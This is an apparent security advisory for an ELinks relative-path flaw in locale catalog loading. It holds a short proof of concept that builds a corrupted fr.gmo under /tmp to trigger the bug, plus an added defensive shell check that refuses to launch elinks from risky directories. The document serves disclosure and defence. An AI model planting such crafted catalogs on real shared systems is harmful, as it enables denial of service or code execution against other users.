ELinks Relative Path Arbitrary Code Execution Vulnerability
To exploit this issue, attackers must entice victims into executing the application from a controlled directory (such as '/tmp'). To trigger a denial of service, the attacker must supply a malformed catalog.

The following proof of concept is available:

$ mkdir -p /tmp/elinks/{run,po}
$ cp /usr/share/locale/fr/LC_MESSAGES/elinks.mo /tmp/elinks/po/fr.gmo
$ dd if=/dev/urandom of=/tmp/elinks/po/fr.gmo bs=1024 seek=1 count=200
$ cd /tmp/elinks/run
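
A pre-launch check for the condition described above, as an added example that is not part of the original advisory. It assumes, based on the proof-of-concept layout, that catalogs are picked up from ../po/*.gmo relative to the working directory; the names check_launch_dir and safe_elinks are hypothetical.

```shell
#!/bin/sh
# Added example: pre-launch check for the relative-path catalog issue.
# Assumption (inferred from the PoC layout): catalogs are looked up in
# ../po/*.gmo relative to the current working directory.

# check_launch_dir DIR
# Prints each finding; returns 0 when DIR looks safe, 1 when it does not.
check_launch_dir() {
    dir=${1:-.}
    # Resolve symlinks so "../po" is evaluated against the real location.
    real=$(cd "$dir" 2>/dev/null && pwd -P) || {
        echo "cannot enter: $dir"
        return 1
    }
    parent=$(dirname "$real")
    po="$parent/po"
    rc=0

    # 1. A sibling po/ directory holding compiled catalogs would be picked up.
    if [ -d "$po" ]; then
        for f in "$po"/*.gmo; do
            [ -e "$f" ] || continue
            echo "catalog reachable via ../po: $f"
            rc=1
        done
    fi

    # 2. If other users can write to the parent, they can create po/ later.
    #    The 9th character of the ls -ld mode string is the "other write" bit.
    case $(ls -ld "$parent") in
        ????????w*)
            echo "parent directory is world-writable: $parent"
            rc=1
            ;;
    esac
    return $rc
}

# Wrapper: only start the browser when the check passes.
safe_elinks() {
    check_launch_dir . || { echo "refusing to start elinks here" >&2; return 1; }
    elinks "$@"
}
```

The check is advisory only: it narrows the window but does not replace running a fixed build of the application.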